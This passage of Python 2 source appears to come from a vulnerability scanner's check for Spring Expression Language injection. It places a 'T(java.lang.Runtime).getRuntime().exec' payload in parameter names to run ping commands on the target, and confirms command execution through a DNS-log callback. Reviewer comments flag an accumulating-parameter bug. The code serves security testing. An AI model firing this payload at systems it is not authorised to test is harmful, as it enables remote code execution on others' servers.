                vv = params_dict[kk]
                random_str, ping_cmd_list = _cmd_poc()
                for ping_cmd in ping_cmd_list:

                    # NOTE(review): ``kk`` accumulates across iterations.
                    kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % (
                        kk, ping_cmd)

                    cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" %
                                                (kk, vv))
                    # NOTE(review): again sent as GET with no body in the POST
                    # branch -- confirm intended.
                    res, content = http.request(url=cmd_url,
                                                method='GET',
                                                headers=header)
                    if callback(random_str):
                        detail = "通过dns log检测到命令执行漏洞"
                        request = getRequest(cmd_url, domain=ob['domain'])
                        response = getResponse(res)
                        result.append(
                            getRecord(ob, cmd_url, ob['level'], detail,
                                      request, response))
                        break
    # Broad catch: any failure above ends the check for this item with a
    # single log line (and the message names the wrong function).
    except Exception, e:
        logger.error("File:exec_cmd_dns_log.py, run_domain function :%s" %
                     (str(e)))